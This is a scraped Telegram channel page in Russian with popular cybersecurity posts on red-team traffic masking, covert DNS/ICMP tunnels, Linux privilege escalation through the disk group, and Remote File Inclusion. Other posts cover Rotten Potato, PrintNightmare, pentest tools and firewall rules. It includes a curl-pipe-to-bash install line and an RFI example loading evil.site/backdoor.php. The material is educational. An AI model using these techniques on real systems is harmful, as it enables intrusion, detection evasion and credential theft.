Мир сегодня с "Юрий Подоляка"
Мир сегодня с "Юрий Подоляка"
Труха⚡️Україна
Труха⚡️Україна
Николаевский Ванёк
Николаевский Ванёк
Мир сегодня с "Юрий Подоляка"
Мир сегодня с "Юрий Подоляка"
Труха⚡️Україна
Труха⚡️Україна
Николаевский Ванёк
Николаевский Ванёк
ZeroDay | Кибербезопасность avatar

ZeroDay | Кибербезопасность

Ваш учебник по кибербезопасности
Реклама - @bashmak_media
https://telega.in/c/cybersec_academy
РКН: https://vk.cc/cHYqeq
TGlist rating
0
0
TypePublic
Verification
Not verified
Trust
Not trusted
LocationРосія
LanguageOther
Channel creation dateJul 16, 2023
Added to TGlist
Oct 31, 2024
Linked chat

Records

21.04.202523:59
36.1KSubscribers
19.02.202503:07
300Citation index
21.03.202504:23
2.9KAverage views per post
26.03.202513:30
2.5KAverage views per ad post
29.03.202523:59
7.29%ER
20.03.202523:59
8.38%ERR
Subscribers
Citation index
Avg views per post
Avg views per ad post
ER
ERR
NOV '24DEC '24JAN '25FEB '25MAR '25APR '25

Popular posts ZeroDay | Кибербезопасность

28.03.202514:00
Маскирование трафика с Cloudflare, DNS over HTTPS (DoH) и Shadowsocks

👋 Приветствую в мире цифровой безопасности!

Сегодня разберем, как можно замаскировать трафик при Red Team-операциях и не только.


Зачем это нужно: Если ваш трафик мониторится Deep Packet Inspection (DPI) или ограничивается провайдерами, то стандартные VPN и прокси могут не сработать. DoH + Shadowsocks помогают скрывать трафик, обходить блокировки и не палиться.

Включаем DoH (DNS over HTTPS): Чтобы скрыть DNS-запросы от провайдера и DPI, включаем DoH с серверами Cloudflare (1.1.1.1). Проверяем, поддерживает ли система DoH:

resolvectl status


Настраиваем Cloudflare DoH в systemd-resolved:

sudo nano /etc/systemd/resolved.conf


Добавляем:

[Resolve]
DNS=1.1.1.1#cloudflare-dns.com
FallbackDNS=1.0.0.1#cloudflare-dns.com
DNSOverTLS=yes


Применяем настройки:

sudo systemctl restart systemd-resolved


Поднимаем Shadowsocks и тем самым скрываем реальный трафик. Shadowsocks не просто шифрует трафик — он делает его похожим на обычный HTTPS, обходя DPI. Устанавливаем сервер Shadowsocks:

sudo apt install shadowsocks-libev


Открываем конфиг /etc/shadowsocks-libev/config.json:

{


Запускаем сервер:

sudo systemctl start shadowsocks-libev


Скрываем IP за Cloudflare: Теперь трафик зашифрован, но IP-сервер все еще виден. Тут нужен cloudflare. Сначала добавляем домен в Cloudflare и включаем Proxy Mode. И далее активируем Argo Tunnel, чтобы трафик шел через Cloudflare без прямого IP-соединения:

cloudflared tunnel create my-tunnel
cloudflared tunnel route dns my-tunnel mydomain.com
cloudflared tunnel run my-tunnel


ZeroDay | #redteam #маскировкатрафика
01.04.202515:40
Расширенная маскировка трафика: ESNI, V2Ray и Covert Channels
Часть 2

👋 Приветствую в мире цифровой безопасности!

Сегодня разберем, как усилить маскировку с помощью ESNI, V2Ray и скрытых каналов передачи данных.


ESNI против SNI-фильтрации: Когда подключаетесь к сайту по HTTPS, провайдер все равно видит домен через SNI (Server Name Indication). Так можно легко заблокировать целые сайты, даже если у вас VPN или прокси.

И тут Encrypted SNI (ESNI) решает проблему, зашифровывая эту информацию. На Cloudflare ESNI включается прямо в браузере:
• Открываем about:config в Firefox
• Ищем network.security.esni.enabled
• Ставим true

V2Ray: превращаем трафик в обычный веб: Shadowsocks хорош, но его можно обнаружить. V2Ray позволяет маскировать соединения, превращая их в обычные HTTP-запросы.

Устанавливаем V2Ray на сервер:

bash <(curl -L https://install.direct/go.sh)


Настраиваем config.json:

{


Covert Channels: передача данных в неожиданных местах: Что если DPI фильтрует вообще все, кроме разрешенного трафика? Можно передавать данные там, где их ну точно не ждут:

1️⃣ICMP туннелинг (DNSCat2) — прячем трафик в пингах
2️⃣DNS туннелинг (iodine) — передаем данные через DNS-запросы
3️⃣HTTP(S) covert channel — запаковываем полезную нагрузку в GET/POST-запросы

Пример ICMP-туннеля:

sudo apt install iodine


На клиенте:

iodine -f 10.0.0.1 mydomain.com


ZeroDay | #маскировкатрафика
16.04.202516:39
Повышение привилегий через группу disk в Linux

👋 Приветствую в мире цифровой безопасности!

Сегодня разберем довольно недооцененную технику эскалации прав в Linux — через группу disk.

В чем суть: Если юзер состоит в группе disk, он может взаимодействовать с устройствами хранения — в частности, с основным диском /dev/sda. Это значит, что он может читать (а иногда и писать!) в файловую систему напрямую — например, достать id_rsa root-пользователя.

Сценарий атаки на пальцах:

1️⃣Создаем пользователя raj и добавляем его в элитную группу disk:

adduser raj  


2️⃣Включаем SSH-доступ для root (не забудьте про PermitRootLogin yes и PubkeyAuthentication yes).

3️⃣Подключаемся как raj, проверяем диск и открываем debugfs:

debugfs /dev/sda3  


4️⃣Копируем приватный ключ, даем ему нужные права и входим в систему уже как root:

chmod 600 id_rsa  


5️⃣Дальше по вкусу: читаем /etc/shadow, выкачиваем хэши, устраиваем барбекю.

Почему это реально опасно: Это не баг, это фича, которой можно злоупотребить. Особенно если кто-то случайно или по глупости добавил пользователя в disk. А на обычных десктопах или в dev-средах это бывает вполне себе часто.

ZeroDay | #атака
25.03.202515:00
Настройка фаервола в Windows через PowerShell

👋 Приветствую в мире цифровой безопасности!

Сегодня поговорим о том, как можно настроить фаервол в Windows через PowerShell

Встроенный фаервол — это удобный инструмент для блокировки нежеланных соединений. Но вдруг хотите более точной настройки, тогда и можно использовать PowerShell и его модуль NetSecurity. Он дает доступ вообще ко всем возможностям брандмауэра, от создания новых правил до их удаления.

Запуск модуля NetSecurity: Чтобы приступить к настройке, нужно сначала подключить модуль NetSecurity:

Import-Module -Name 'NetSecurity'


Смотрим текущие правила: сейчас, когда уже модуль подключен, давайте узнаем, какие правила уже стоят в системе. Для этого используем команду:

Get-NetFirewallRule | Select-Object DisplayName, Enabled, Direction, Action -First 10


И вот вам обзор: сколько правил, какие включены, какой трафик блокируется. Если захотите подробности по каждому правилу, можно получить все параметры:

Get-NetFirewallRule | Select-Object * -First 1


Создаем новое правило: Теперь сделаем реально полезную штуку — заблокируем WINS. Для этого создаем правило, которое блокирует входящий трафик:

$Params = @{ 


Изменяем существующее правило: Если захотите поменять действие у уже настроенного правила, например, разрешить WINS, используем команду:

$Params = @{


Вот теперь WINS снова работает.

Удаляем ненужные правила: Если старое правило вам больше не нужно, удаляем его:

Remove-NetFirewallRule -DisplayName "Block WINS"


Удаление сразу нескольких правил: Еще один лайфхак — удалить несколько правил сразу. Например, все отключенные правила:

Remove-NetFirewallRule -Enabled 'False'


ZeroDay | #firewall #powershell
CORS, CORP, COEP, COOP. Разбираемся со всеми CO* и смотрим на нюансы

CORS, CORP, COEP, COOP — что вообще объединят все эти аббревиатуры, кроме того, что они начинаются на “CO”? Эти политики играют мега важную роль в безопасности веб-приложений, ограничивая доступ к ресурсам с других доменов и предотвращая утечки данных.

⏺В статье будет разбор того, как конкретно работают эти механизмы, чем они отличаются друг от друга и почему правильная настройка очень критична для защиты ваших веб-приложений от возможных угроз.

ZeroDay | #Статья
31.03.202510:00
CloudFail: как обойти защиту Cloudflare и раскрыть скрытые IP

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

CloudFail — ну это прямо подарок для пентестеров. Он использует старые БД и уязвимые DNS-записи, чтобы выявить реальные IP, скрытые за защитой Cloudflare. И да, всё это делается через Tor, так что с анонимностью все ок 🤫

Как работает:
1️⃣Ищет уязвимости в DNS-записях через DNSDumpster.
2️⃣Проверяет IP-адреса в базе Crimeflare — это утечка старых данных.
3️⃣Перебирает более 2500 субдоменов, используя метод брутфорса.

Что нового: В форке исправлены старые ошибки с API, добавлена возможность генерировать отчёты и выводить IP в удобном списке.

ZeroDay | #Инструмент
Fastflux: как быстро уходить от блокировок?

👋 Приветствую в мире цифровой безопасности!

Расскажу, как работает Fast Flux.

Что такое Fast Flux: это техника, которую используют хакеры, скрывая свои вредоносные серверы, постоянно меняя их IP-адреса. И да, этот способ делает их сайты и ботнеты сложными для обнаружения и блокировки.

3 столпа, на которых держится fastflux

1️⃣Частая смена IP-адресов — суть метода в том, что DNS-записи обновляются буквально каждую минуту, что делает сайт или сервер трудноуловимым.
2️⃣Сеть заражённых устройств — вместо одного сервера злоумышленники используют целую армию заражённых машин, которые перенаправляют трафик, маскируя источник атаки.
3️⃣Двухуровневый Fast Flux — это более сложная версия, в которой не только конечные серверы, но и промежуточные узлы меняют IP-адреса, создавая почти невидимую инфраструктуру.

Как вы поняли, Fast Flux делает блокировку вредоносных сайтов ну сильно запарнее — как только заблокирован один IP, хакеры тут же переключают трафик на новый.

Как защититься: Начнем с анализа DNS-записей и трафика на необычные изменения. Ну и не забываем подключать методы блокировки, которые учитывают поведение сети — они помогут быстрее поймать кого нужно.

ZeroDay | #fastflux
21.03.202514:00
Rotten Potato: получаем права SYSTEM через RPC

👋 Приветствую в мире цифровой безопасности!

Расскажу о еще одной уязвимости Rotten Potato.

Что это за атака: вся суть тут в использовании слабостей в RPC и NTLM-аутентификации. Хакер манипулирует процессом аутентификации на подставном прокси и вуаля — получает доступ с правами SYSTEM, не трогая ни одного бинарного файла.

Почему это круто (для хакера, конечно): вот задумайтесь, вся атака основана на обычных службах Windows, и даже не требуется передавать вредоносные файлы. Это значит, что обычные методы защиты могут вообще не заметить проблему.

Как найти следы атаки:
1️⃣Подозрительные каналы в Sysmon (EventID 17, 18) — и сразу видно, что что-то не так.
2️⃣Журнал Windows (EventID 5712 и 5154) покажет запросы на порт 6666, когда хакер пытается обойти защиту.
3️⃣Если в логах встречаем RottenPotato.exe — это уж точно сигнал тревоги.

ZeroDay | #атака
Редтимим мониторинг: рекон Grafana

Grafana — это не простой инструмент для анализа данных, а порой и уязвимая точка входа в корпоративную сеть. Получив доступ, хакеры могут обойти защиту и расширить атаку в сети. А это уже неприятно, да? 🙄

⏺В статье рассказано, как использовали Grafana для сканирования портов, SSRF-атак и обхода авторизации с помощью брутфорса.

ZeroDay | #Статья
📝 Как работает Remote File Inclusion (RFI)

Всё начинается с безобидного параметра в URL — сайт хочет подключить нужную страницу. Но он же может подключить чужую, вместо своей 🧐

⏺Веб-приложение получает запрос вроде: ?page=about.php — и просто включает указанный файл.

Но фильтрации нет. И теперь можно подставить ссылку на внешний файл: ?page=https://evil.site/backdoor.php

⏺Сервер, ничего не подозревая, скачивает внешний PHP-файл и исполняет его как часть своего кода.

Этот код может делать всё: красть данные, открывать удалённый доступ, ставить бекдоры — потому что он запускается от имени сервера.

⏺Пока юзер думает, что пользуется сайтом — на сервере уже работает чужой сценарий.

ZeroDay | #атака
Расследование: как фальшивые DNS-записи крадут ваши данные, а вы и не замечаете

Вы вводите URL любимого сайта, но попадаете на его идеальную копию, созданную мошенниками. Что, если DNS-система работает против вас? Подмены записей, отравление кэша и атаки через MITM — все это может привести к краже ваших данных: от паролей до криптокошельков.

⏺В статье — детальное разъяснение того, как хакеры юзают уязвимости в DNS для кражи данных, а также как можно защититься от подобных атак и избежать фишинга.

ZeroDay | #Статья
PrintNightmare: неприятная уязвимость в Windows

👋 Приветствую в мире цифровой безопасности!

Сегодня поговорим про уязвимость PrintNightmare.

PrintNightmare — уязвимость в службе Print Spooler в Windows, которая может привести к удалённому выполнению кода на вашем устройстве. Да, это именно та служба, что управляет задачами на печать, и её уязвимость открывает доступ по сути ко всей вашей системе. Звучит страшно, верно?😦

Как это работает?
1️⃣Хакер настраивает SMB-соединение с уязвимой системой и выполняет RPC-запросы.
2️⃣После этого он добавляет вредоносный драйвер, который содержит ссылку на DLL-библиотеку.
3️⃣Windows загружает эту библиотеку, предоставляя хакеру доступ к системе.

В чем опасность: Print Spooler, как мы уже обсудили, играет супер важную роль в работе системы, а её уязвимость позволяет обходить многие защиты. Патчи и обновления — это, конечно, важно, но эта опасность все же продолжает оставаться на горизонте, и новые способы атак могут быть уже на подходе.

ZeroDay | #fastflux
Бюджет в кибербезе и масштабы проблем 😂

ZeroDay | #мем
25.03.202510:00
AlterX: Быстро генерируем субдомены для пентеста

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

Что это такое: AlterX — настоящий мастхэв для пентестеров и ИБшников. Он использует умные шаблоны и переменные, чтобы создавать списки субдоменов, которые реально работают. Убираем всякие неактуальные домены и увеличиваем шанс на реальный результат.

Как это работает: вы задаете шаблоны с переменными типа {{sub}}, {{suffix}} и {{tld}}, а AlterX генерирует вам все возможные комбинации, которые могут быть полезны. Хотите больше точности? Просто подгоните шаблон под свой проект.

Зачем вам AlterX: если вы делитесь своими шаблонами с командой или работаете на нескольких проектах, то AlterX позволит легко и быстро создавать словари для субдоменов. И, что важно, вы точно будете проверять то, что действительно существует.

И 3 крутые фишки от меня:
• Мгновенные и точные пермутации с кастомными паттернами
• Использует переменные как в Nuclei, чтобы сделать словари умными
• Обогащение словарей за секунду и гибкая настройка

ZeroDay | #Инструмент
🚩Ищите красные флаги — и это не про отношения
 
Selectel подготовил CTF-задачи для специалистов по кибербезопасности и предлагает вам решить их. Вы потренируете не только навыки криптографии и разработки, но и почувствуете себя настоящим детективом, ведь некоторые задачи закручены хитроумнее, чем преступления в книгах Агаты Кристи.
 
🔎 Шпионские штучки
Наконец, вам удалось перехватить трафик, в котором должен быть ключ к адресу одной секретной службы. Вы почти у цели, осталось разобрать дамп и следовать верным маршрутом.
 
🔎 Приглашение на ИБ-вечеринку
Специалисты по ИБ закатили праздник, но без специального ключа на него не попасть. Отыщите этот ключ, пока веселье еще в разгаре!
 
🔎 Тир на открытом воздухе
Звучит заманчиво, но только не в ветреную погоду. Попробуйте выстрелить точно в яблочко, чтобы получить награду.
 
Для каждой задачи уже готово решение, так что можно сразу проверить себя.
 
Реклама. АО “Селектел”, ИНН: 7810962785. ERID: 2VtzqvmPPVA
Log in to unlock more functionality.